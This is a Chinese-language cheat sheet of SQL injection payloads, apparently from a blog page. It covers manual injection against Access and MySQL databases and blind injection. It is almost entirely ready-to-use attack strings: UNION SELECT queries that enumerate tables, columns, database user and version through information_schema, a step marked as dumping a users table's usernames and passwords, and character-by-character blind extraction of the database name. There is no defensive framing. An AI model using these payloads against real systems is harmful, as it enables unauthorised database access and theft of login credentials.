ACCESS手工注入
查询是否存在admin表:and exists (select * from admin)
是否存在username列: and exists (select username from admin)
是否存在password列: and exists (select password from admin)
猜测列长度: order by N
猜测字段位置: union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from admin
猜测username字段位置内容: union select 1,username,3,4,5,6,7,8,9,10,11,12,13 from admin
猜测password字段位置内容: union select 1,username,password,4,5,6,7,8,9,10,11,12,13 from admin
MySQL手工注入
联合查询字段长度:and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
查看数据库信息:
查看当前用户:and 1=2 union select 1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
查看当前数据库:and 1=2 union select 1,2,3,4, database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
查看mysql版本:and 1=2 union select 1,2,3,4, version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
查看当前mysql所有库名称:and 1=2 union select 1,2,3,4,group_concat(convert (SCHEMA_NAME using latin1)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from information_schema.SCHEMATA
查看数据库表:and 1=2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()
查看users表内容:and 1=2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=0x7573657273
猜测字段内容(脱裤):and 1=2 union select 1,group_concat(username,password),3,4,5,6 from users
SQL盲注
判断数据库名称长度: 1' and length(database())=4 #
数字是ASCII码对照表
查询数据库第一位: 1' and ascii(substr(database(),1,1))=100 #
查询数据库第二位: 1' and ascii(substr(database(),2,1))=118 #
查询数据库第三位:1' and ascii(substr(database(),3,1))=119 #
查询数据库第四位:1' and ascii(substr(database(),4,1))=97 #
我的内容管理
展开
